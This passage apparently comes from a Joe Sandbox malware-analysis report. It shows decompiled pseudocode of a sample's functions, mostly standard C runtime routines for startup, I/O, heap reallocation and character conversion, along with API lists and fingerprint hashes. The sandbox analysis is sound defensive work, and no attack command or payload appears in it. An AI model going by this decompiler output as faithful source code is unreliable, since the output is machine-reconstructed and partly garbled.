              								 *((intOrPtr*)(_t87 - 0x18)) = 0x6e006b;
              								 *((intOrPtr*)(_t87 - 0x14)) = 0x77006f;
              								 *((intOrPtr*)(_t87 - 0x10)) = 0x6e;
              								E0041BF00(_t64, _t87 - 0x1c, 0x10);
              								_t93 = _t93 + 0xc;
              							}
              						} else {
              							 *((short*)(_t83 + 0x44fc)) = 0;
              						}
              						_t81 = _t83 + 0x4cfc;
              						E0041BF00(_t83 + 0x4cfc, _t87 - 0x3c, 0x14);
              						E0041C360(_t81, _t87 - 0xc, 0);
              						E0041C360(_t81, _t64, 0);
              						E0041C360(_t81, _t87 - 0xc, 0);
              						E0041C360(_t81,  *((intOrPtr*)(_t87 + 0xc)), 0);
              						 *((intOrPtr*)(_t83 + 0xa0c)) = E0041C1F0(_t81) + _t51;
              						_t54 = E0041C1F0(_t81) + _t53;
              						__eflags = E0041C1F0(_t81) + _t53;
              						E0041BF00( *((intOrPtr*)(_t83 + 0xa08)), _t81, _t54);
              						_t40 = E0040D400(_t83, 0x13);
              					}
              					return _t40;
              				} else {
              					asm("pushfd");
              					return 1;
              				}
              			}

              Similarity
              • API ID:
              • String ID: C$a$b$d$i
              • API String ID: 0-2334916691
              • Opcode ID: ef34da2694c3f12963ebffe9c41f50502077d54d39a34053af1e1a013b869dd7
              • Instruction ID: 3fc29d8dc521fb469a95bbb8abda6683934d66c57c2c0db649a3b8fa327b9fe1
              • Opcode Fuzzy Hash: ef34da2694c3f12963ebffe9c41f50502077d54d39a34053af1e1a013b869dd7
              • Instruction Fuzzy Hash: 8C31C2B1A4020CAAD710DFA1DC81FFEB3B9EF85708F00841EF515A7242D77956458B6D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040CA02(void* __eax) {
              
              				return __eax - 1;
              			}

              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77d6fe3352f2066132d2e11dddcf5daa928ef289f5f3e69130d54cc179b5aa1c
              • Instruction ID: 08b14579047c8707026fac63fccc300bf9580103bc096abe646392d642804b1d
              • Opcode Fuzzy Hash: 77d6fe3352f2066132d2e11dddcf5daa928ef289f5f3e69130d54cc179b5aa1c
              • Instruction Fuzzy Hash: 69A0011BF494180148249C8A78410B4E364D197176E5032A7DE0CF35005402C425019D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E00E138B8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				signed int* _t82;
              				signed int _t86;
              				long _t90;
              				void* _t91;
              				intOrPtr _t94;
              				signed int _t98;
              				signed int _t99;
              				signed char _t103;
              				void** _t105;
              				void** _t106;
              				void** _t109;
              				signed char _t111;
              				long _t119;
              				void* _t129;
              				signed int* _t133;
              				void* _t135;
              				signed int* _t138;
              				void** _t139;
              				void* _t141;
              				signed int _t142;
              				signed int _t143;
              				void** _t147;
              				signed int _t149;
              				void* _t150;
              				void** _t154;
              				void* _t155;
              				void* _t156;
              
              				_push(0x64);
              				_push(0xe22260);
              				E00E12410(__ebx, __edi, __esi);
              				E00E1443F(0xb);
              				 *(_t155 - 4) = 0;
              				_push(0x40);
              				_t141 = 0x20;
              				_push(_t141);
              				_t82 = E00E14879();
              				_t133 = _t82;
              				 *(_t155 - 0x24) = _t133;
              				if(_t133 != 0) {
              					 *0xe24848 = _t82;
              					 *0xe250e4 = _t141;
              					while(_t133 <  &(_t82[0x200])) {
              						_t133[1] = 0xa00;
              						 *_t133 =  *_t133 | 0xffffffff;
              						_t133[2] = 0;
              						_t133[9] = _t133[9] & 0x00000080;
              						_t133[9] = _t133[9] & 0x0000007f;
              						_t133[9] = 0xa0a;
              						_t133[0xe] = 0;
              						_t133[0xd] = 0;
              						_t133 =  &(_t133[0x10]);
              						 *(_t155 - 0x24) = _t133;
              						_t82 =  *0xe24848; // 0x0
              					}
              					GetStartupInfoW(_t155 - 0x74);
              					if( *((short*)(_t155 - 0x42)) == 0) {
              						L27:
              						_t129 = 0xfffffffe;
              						L28:
              						_t142 = 0;
              						while(1) {
              							 *(_t155 - 0x2c) = _t142;
              							if(_t142 >= 3) {
              								break;
              							}
              							_t147 =  *0xe24848 + (_t142 << 6);
              							 *(_t155 - 0x24) = _t147;
              							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
              								_t147[1] = 0x81;
              								if(_t142 != 0) {
              									_t65 = _t142 - 1; // -1
              									asm("sbb eax, eax");
              									_t90 =  ~_t65 + 0xfffffff5;
              								} else {
              									_t90 = 0xfffffff6;
              								}
              								_t91 = GetStdHandle(_t90);
              								 *(_t155 - 0x1c) = _t91;
              								if(_t91 == 0xffffffff || _t91 == 0) {
              									L45:
              									_t147[1] = _t147[1] | 0x00000040;
              									 *_t147 = _t129;
              									_t94 =  *0xe26100;
              									if(_t94 != 0) {
              										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
              									}
              									goto L47;
              								} else {
              									_t98 = GetFileType(_t91);
              									if(_t98 == 0) {
              										goto L45;
              									}
              									 *_t147 =  *(_t155 - 0x1c);
              									_t99 = _t98 & 0x000000ff;
              									if(_t99 != 2) {
              										if(_t99 != 3) {
              											L44:
              											_t71 =  &(_t147[3]); // -14829628
              											E00E140B2(_t71, 0xfa0, 0);
              											_t156 = _t156 + 0xc;
              											_t147[2] = _t147[2] + 1;
              											goto L47;
              										}
              										_t103 = _t147[1] | 0x00000008;
              										L43:
              										_t147[1] = _t103;
              										goto L44;
              									}
              									_t103 = _t147[1] | 0x00000040;
              									goto L43;
              								}
              							} else {
              								_t147[1] = _t147[1] | 0x00000080;
              								L47:
              								_t142 = _t142 + 1;
              								continue;
              							}
              						}
              						 *(_t155 - 4) = _t129;
              						E00E13B63();
              						_t86 = 0;
              						L49:
              						return E00E12455(_t86);
              					}
              					_t105 =  *(_t155 - 0x40);
              					if(_t105 == 0) {
              						goto L27;
              					}
              					_t135 =  *_t105;
              					 *(_t155 - 0x1c) = _t135;
              					_t106 =  &(_t105[1]);
              					 *(_t155 - 0x28) = _t106;
              					 *(_t155 - 0x20) = _t106 + _t135;
              					if(_t135 >= 0x800) {
              						_t135 = 0x800;
              						 *(_t155 - 0x1c) = 0x800;
              					}
              					_t149 = 1;
              					 *(_t155 - 0x30) = 1;
              					while( *0xe250e4 < _t135) {
              						_t138 = E00E14879(_t141, 0x40);
              						 *(_t155 - 0x24) = _t138;
              						if(_t138 != 0) {
              							0xe24848[_t149] = _t138;
              							 *0xe250e4 =  *0xe250e4 + _t141;
              							while(_t138 <  &(0xe24848[_t149][0x200])) {
              								_t138[1] = 0xa00;
              								 *_t138 =  *_t138 | 0xffffffff;
              								_t138[2] = 0;
              								_t138[9] = _t138[9] & 0x00000080;
              								_t138[9] = 0xa0a;
              								_t138[0xe] = 0;
              								_t138[0xd] = 0;
              								_t138 =  &(_t138[0x10]);
              								 *(_t155 - 0x24) = _t138;
              							}
              							_t149 = _t149 + 1;
              							 *(_t155 - 0x30) = _t149;
              							_t135 =  *(_t155 - 0x1c);
              							continue;
              						}
              						_t135 =  *0xe250e4;
              						 *(_t155 - 0x1c) = _t135;
              						break;
              					}
              					_t143 = 0;
              					 *(_t155 - 0x2c) = 0;
              					_t129 = 0xfffffffe;
              					_t109 =  *(_t155 - 0x28);
              					_t139 =  *(_t155 - 0x20);
              					while(_t143 < _t135) {
              						_t150 =  *_t139;
              						if(_t150 == 0xffffffff || _t150 == _t129) {
              							L22:
              							_t143 = _t143 + 1;
              							 *(_t155 - 0x2c) = _t143;
              							_t109 =  &(( *(_t155 - 0x28))[0]);
              							 *(_t155 - 0x28) = _t109;
              							_t139 =  &(_t139[1]);
              							 *(_t155 - 0x20) = _t139;
              							continue;
              						} else {
              							_t111 =  *_t109;
              							if((_t111 & 0x00000001) == 0) {
              								goto L22;
              							}
              							if((_t111 & 0x00000008) != 0) {
              								L20:
              								_t154 = 0xe24848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
              								 *(_t155 - 0x24) = _t154;
              								 *_t154 =  *_t139;
              								_t154[1] =  *( *(_t155 - 0x28));
              								_t37 =  &(_t154[3]); // 0xd
              								E00E140B2(_t37, 0xfa0, 0);
              								_t156 = _t156 + 0xc;
              								_t154[2] = _t154[2] + 1;
              								_t139 =  *(_t155 - 0x20);
              								L21:
              								_t135 =  *(_t155 - 0x1c);
              								goto L22;
              							}
              							_t119 = GetFileType(_t150);
              							_t139 =  *(_t155 - 0x20);
              							if(_t119 == 0) {
              								goto L21;
              							}
              							goto L20;
              						}
              					}
              					goto L28;
              				}
              				_t86 = E00E12610(_t155, 0xe23400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
              				goto L49;
              			}































              APIs
              • __lock.LIBCMT ref: 00E138C6
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __calloc_crt.LIBCMT ref: 00E138D7
                • Part of subcall function 00E14879: __calloc_impl.LIBCMT ref: 00E14888
              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E138F2
              • GetStartupInfoW.KERNEL32(?,00E22260,00000064,00E11664,00E22190,00000014), ref: 00E1394B
              • __calloc_crt.LIBCMT ref: 00E13996
              • GetFileType.KERNEL32(00000001), ref: 00E139DF
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
              • String ID:
              • API String ID: 2772871689-0
              • Opcode ID: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction ID: 2958a021a691dcd6b18f8b9739dc229ccbab23f6871ba39901228fd0587c188c
              • Opcode Fuzzy Hash: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction Fuzzy Hash: 3481D4719052458FCB24CF79C8419EDBBF0AF09324B24A26DE4A6BB3D1D7349983CB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E00E13825(void* __ebx, void* __edi, void* __eflags) {
              				void* __esi;
              				void* _t3;
              				intOrPtr _t6;
              				long _t14;
              				long* _t27;
              
              				E00E118A0(_t3);
              				if(E00E14570() != 0) {
              					_t6 = E00E14011(E00E135B6);
              					 *0xe2350c = _t6;
              					__eflags = _t6 - 0xffffffff;
              					if(_t6 == 0xffffffff) {
              						goto L1;
              					} else {
              						_t27 = E00E14879(1, 0x3bc);
              						__eflags = _t27;
              						if(_t27 == 0) {
              							L6:
              							E00E1389B();
              							__eflags = 0;
              							return 0;
              						} else {
              							__eflags = E00E1406D( *0xe2350c, _t27);
              							if(__eflags == 0) {
              								goto L6;
              							} else {
              								_push(0);
              								_push(_t27);
              								E00E13772(__ebx, __edi, _t27, __eflags);
              								_t14 = GetCurrentThreadId();
              								_t27[1] = _t27[1] | 0xffffffff;
              								 *_t27 = _t14;
              								__eflags = 1;
              								return 1;
              							}
              						}
              					}
              				} else {
              					L1:
              					E00E1389B();
              					return 0;
              				}
              			}









              APIs
              • __init_pointers.LIBCMT ref: 00E13825
                • Part of subcall function 00E118A0: EncodePointer.KERNEL32(00000000,?,00E1382A,00E1164A,00E22190,00000014), ref: 00E118A3
                • Part of subcall function 00E118A0: __initp_misc_winsig.LIBCMT ref: 00E118BE
                • Part of subcall function 00E118A0: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E14127
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E1413B
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E1414E
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E14161
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E14174
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E14187
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E1419A
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E141AD
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E141C0
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E141D3
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E141E6
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E141F9
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E1420C
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E1421F
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E14232
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E14245
              • __mtinitlocks.LIBCMT ref: 00E1382A
              • __mtterm.LIBCMT ref: 00E13833
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E1448A
                • Part of subcall function 00E1389B: _free.LIBCMT ref: 00E14491
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(00E23558,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E144B3
              • __calloc_crt.LIBCMT ref: 00E13858
              • __initptd.LIBCMT ref: 00E1387A
              • GetCurrentThreadId.KERNEL32 ref: 00E13881
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 3567560977-0
              • Opcode ID: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction ID: 529ad6d4e10df530e88ead8e88d8a4bcef86403103d4ad6fbb5532aa8f76deca
              • Opcode Fuzzy Hash: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction Fuzzy Hash: 36F0B4B25183211EE23C7B757C076CA2BC19F41B74B21A62AF565F92D2FF51CAC24A90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00E191D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
              				char _v8;
              				intOrPtr _v12;
              				signed int _v20;
              				signed int _t35;
              				int _t38;
              				signed int _t41;
              				int _t42;
              				intOrPtr* _t44;
              				int _t47;
              				short* _t49;
              				intOrPtr _t50;
              				intOrPtr _t54;
              				int _t55;
              				signed int _t59;
              				char* _t62;
              
              				_t62 = _a8;
              				if(_t62 == 0) {
              					L5:
              					return 0;
              				}
              				_t50 = _a12;
              				if(_t50 == 0) {
              					goto L5;
              				}
              				if( *_t62 != 0) {
              					E00E14C0C( &_v20, _a16);
              					_t35 = _v20;
              					__eflags =  *(_t35 + 0xa8);
              					if( *(_t35 + 0xa8) != 0) {
              						_t38 = E00E1918B( *_t62 & 0x000000ff,  &_v20);
              						__eflags = _t38;
              						if(_t38 == 0) {
              							__eflags = _a4;
              							_t41 = _v20;
              							_t59 = 1;
              							_t28 = _t41 + 4; // 0x840ffff8
              							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
              							__eflags = _t42;
              							if(_t42 != 0) {
              								L21:
              								__eflags = _v8;
              								if(_v8 != 0) {
              									_t54 = _v12;
              									_t31 = _t54 + 0x70;
              									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
              									__eflags =  *_t31;
              								}
              								return _t59;
              							}
              							L20:
              							_t44 = E00E11CD3();
              							_t59 = _t59 | 0xffffffff;
              							__eflags = _t59;
              							 *_t44 = 0x2a;
              							goto L21;
              						}
              						_t59 = _v20;
              						__eflags =  *(_t59 + 0x74) - 1;
              						if( *(_t59 + 0x74) <= 1) {
              							L15:
              							_t20 = _t59 + 0x74; // 0xe1c11fe1
              							__eflags = _t50 -  *_t20;
              							L16:
              							if(__eflags < 0) {
              								goto L20;
              							}
              							__eflags = _t62[1];
              							if(_t62[1] == 0) {
              								goto L20;
              							}
              							L18:
              							_t22 = _t59 + 0x74; // 0xe1c11fe1
              							_t59 =  *_t22;
              							goto L21;
              						}
              						_t12 = _t59 + 0x74; // 0xe1c11fe1
              						__eflags = _t50 -  *_t12;
              						if(__eflags < 0) {
              							goto L16;
              						}
              						__eflags = _a4;
              						_t17 = _t59 + 0x74; // 0xe1c11fe1
              						_t18 = _t59 + 4; // 0x840ffff8
              						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
              						_t59 = _v20;
              						__eflags = _t47;
              						if(_t47 != 0) {
              							goto L18;
              						}
              						goto L15;
              					}
              					_t55 = _a4;
              					__eflags = _t55;
              					if(_t55 != 0) {
              						 *_t55 =  *_t62 & 0x000000ff;
              					}
              					_t59 = 1;
              					goto L21;
              				}
              				_t49 = _a4;
              				if(_t49 != 0) {
              					 *_t49 = 0;
              				}
              				goto L5;
              			}



















              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E1920C
              • __isleadbyte_l.LIBCMT ref: 00E1923A
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00E19268
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00E1929E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID: Ha
              • API String ID: 3058430110-1493737000
              • Opcode ID: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction ID: 125f5428a789225493ff3e53c0835534989de83673c38399f674e3e39fb3c75e
              • Opcode Fuzzy Hash: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction Fuzzy Hash: F531D03160024ABFDB218E65DC54BFA7BE5FF41324F155528F825A71A2D730D8D0DB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E00E112C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
              				char* _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				void* __ebx;
              				void* __esi;
              				signed int _t74;
              				signed int _t78;
              				char _t81;
              				signed int _t86;
              				signed int _t88;
              				signed int _t91;
              				signed int _t94;
              				signed int _t97;
              				signed int _t98;
              				char* _t99;
              				signed int _t100;
              				signed int _t102;
              				signed int _t103;
              				signed int _t104;
              				char* _t110;
              				signed int _t113;
              				signed int _t117;
              				signed int _t119;
              				void* _t120;
              
              				_t99 = _a4;
              				_t74 = _a8;
              				_v8 = _t99;
              				_v12 = _t74;
              				if(_a12 == 0) {
              					L5:
              					return 0;
              				}
              				_t97 = _a16;
              				if(_t97 == 0) {
              					goto L5;
              				}
              				if(_t99 != 0) {
              					_t119 = _a20;
              					__eflags = _t119;
              					if(_t119 == 0) {
              						L9:
              						__eflags = _a8 - 0xffffffff;
              						if(_a8 != 0xffffffff) {
              							_t74 = E00E11540(_t99, 0, _a8);
              							_t120 = _t120 + 0xc;
              						}
              						__eflags = _t119;
              						if(_t119 == 0) {
              							goto L3;
              						} else {
              							_t78 = _t74 | 0xffffffff;
              							__eflags = _t97 - _t78 / _a12;
              							if(_t97 > _t78 / _a12) {
              								goto L3;
              							}
              							L13:
              							_t117 = _a12 * _t97;
              							__eflags =  *(_t119 + 0xc) & 0x0000010c;
              							_t98 = _t117;
              							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
              								_t100 = 0x1000;
              							} else {
              								_t100 =  *(_t119 + 0x18);
              							}
              							_v16 = _t100;
              							__eflags = _t117;
              							if(_t117 == 0) {
              								L41:
              								return _a16;
              							} else {
              								do {
              									__eflags =  *(_t119 + 0xc) & 0x0000010c;
              									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
              										L24:
              										__eflags = _t98 - _t100;
              										if(_t98 < _t100) {
              											_t81 = E00E12762(_t98, _t119, _t119);
              											__eflags = _t81 - 0xffffffff;
              											if(_t81 == 0xffffffff) {
              												L46:
              												return (_t117 - _t98) / _a12;
              											}
              											_t102 = _v12;
              											__eflags = _t102;
              											if(_t102 == 0) {
              												L42:
              												__eflags = _a8 - 0xffffffff;
              												if(_a8 != 0xffffffff) {
              													E00E11540(_a4, 0, _a8);
              												}
              												 *((intOrPtr*)(E00E11CD3())) = 0x22;
              												L4:
              												E00E11E99();
              												goto L5;
              											}
              											_t110 = _v8;
              											 *_t110 = _t81;
              											_t98 = _t98 - 1;
              											_v8 = _t110 + 1;
              											_t103 = _t102 - 1;
              											__eflags = _t103;
              											_v12 = _t103;
              											_t100 =  *(_t119 + 0x18);
              											_v16 = _t100;
              											goto L40;
              										}
              										__eflags = _t100;
              										if(_t100 == 0) {
              											_t86 = 0x7fffffff;
              											__eflags = _t98 - 0x7fffffff;
              											if(_t98 <= 0x7fffffff) {
              												_t86 = _t98;
              											}
              										} else {
              											__eflags = _t98 - 0x7fffffff;
              											if(_t98 <= 0x7fffffff) {
              												_t44 = _t98 % _t100;
              												__eflags = _t44;
              												_t113 = _t44;
              												_t91 = _t98;
              											} else {
              												_t113 = 0x7fffffff % _t100;
              												_t91 = 0x7fffffff;
              											}
              											_t86 = _t91 - _t113;
              										}
              										__eflags = _t86 - _v12;
              										if(_t86 > _v12) {
              											goto L42;
              										} else {
              											_push(_t86);
              											_push(_v8);
              											_push(E00E12883(_t119));
              											_t88 = E00E12A3A();
              											_t120 = _t120 + 0xc;
              											__eflags = _t88;
              											if(_t88 == 0) {
              												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
              												goto L46;
              											}
              											__eflags = _t88 - 0xffffffff;
              											if(_t88 == 0xffffffff) {
              												L45:
              												_t64 = _t119 + 0xc;
              												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
              												__eflags =  *_t64;
              												goto L46;
              											}
              											_t98 = _t98 - _t88;
              											__eflags = _t98;
              											L36:
              											_v8 = _v8 + _t88;
              											_v12 = _v12 - _t88;
              											_t100 = _v16;
              											goto L40;
              										}
              									}
              									_t94 =  *(_t119 + 4);
              									_v20 = _t94;
              									__eflags = _t94;
              									if(__eflags == 0) {
              										goto L24;
              									}
              									if(__eflags < 0) {
              										goto L45;
              									}
              									__eflags = _t98 - _t94;
              									if(_t98 < _t94) {
              										_t94 = _t98;
              										_v20 = _t98;
              									}
              									_t104 = _v12;
              									__eflags = _t94 - _t104;
              									if(_t94 > _t104) {
              										goto L42;
              									} else {
              										E00E128A7(_v8, _t104,  *_t119, _t94);
              										_t88 = _v20;
              										_t120 = _t120 + 0x10;
              										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
              										_t98 = _t98 - _t88;
              										 *_t119 =  *_t119 + _t88;
              										goto L36;
              									}
              									L40:
              									__eflags = _t98;
              								} while (_t98 != 0);
              								goto L41;
              							}
              						}
              					}
              					_t74 = (_t74 | 0xffffffff) / _a12;
              					__eflags = _t97 - _t74;
              					if(_t97 <= _t74) {
              						goto L13;
              					}
              					goto L9;
              				}
              				L3:
              				 *((intOrPtr*)(E00E11CD3())) = 0x16;
              				goto L4;
              			}





























              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
              • String ID:
              • API String ID: 1559183368-0
              • Opcode ID: 7c50b4eb4434fc4256cde1d31d00baebc1c3adbb103b0cf6c9c41cc636181b55
              • Instruction ID: db6e97dcb2303dbdc70d5a3b8f4296e61b3e584acf5095c4c76aafe3c8e9ab21
              • Opcode Fuzzy Hash: 7c50b4eb4434fc4256cde1d31d00baebc1c3adbb103b0cf6c9c41cc636181b55
              • Instruction Fuzzy Hash: 6551E770A00305DBCB249FA9C8806EEB7A6AF40724F2493ADFA35B66D4D7709DD0DB41
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 95%
              			E00E17462(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
              				void* _t7;
              				void* _t8;
              				intOrPtr* _t9;
              				intOrPtr* _t12;
              				void* _t20;
              				long _t31;
              
              				if(_a4 != 0) {
              					_t31 = _a8;
              					if(_t31 != 0) {
              						_push(__ebx);
              						while(_t31 <= 0xffffffe0) {
              							if(_t31 == 0) {
              								_t31 = _t31 + 1;
              							}
              							_t7 = HeapReAlloc( *0xe24834, 0, _a4, _t31);
              							_t20 = _t7;
              							if(_t20 != 0) {
              								L17:
              								_t8 = _t20;
              							} else {
              								if( *0xe24830 == _t7) {
              									_t9 = E00E11CD3();
              									 *_t9 = E00E11CE6(GetLastError());
              									goto L17;
              								} else {
              									if(E00E11751(_t7, _t31) == 0) {
              										_t12 = E00E11CD3();
              										 *_t12 = E00E11CE6(GetLastError());
              										L12:
              										_t8 = 0;
              									} else {
              										continue;
              									}
              								}
              							}
              							goto L14;
              						}
              						E00E11751(_t6, _t31);
              						 *((intOrPtr*)(E00E11CD3())) = 0xc;
              						goto L12;
              					} else {
              						E00E14841(_a4);
              						_t8 = 0;
              					}
              					L14:
              					return _t8;
              				} else {
              					return E00E11151(__ebx, __edx, __edi, _a8);
              				}
              			}










              APIs
              • _malloc.LIBCMT ref: 00E1746E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
              • _free.LIBCMT ref: 00E17481
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AllocHeap_free_malloc
              • String ID:
              • API String ID: 2734353464-0
              • Opcode ID: 15eca442cf25a31ebedbe5a4455c0847769a77508672c6435afc8197461c9feb
              • Instruction ID: fdb8bdce638781f931dc4c01639e15a75793aeaff45d74b0f0adafd60c927542
              • Opcode Fuzzy Hash: 15eca442cf25a31ebedbe5a4455c0847769a77508672c6435afc8197461c9feb
              • Instruction Fuzzy Hash: AA11E77190D2196FCB352F75AC447DA3EE46F04764B206565FA99B6290DA3088C086D0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
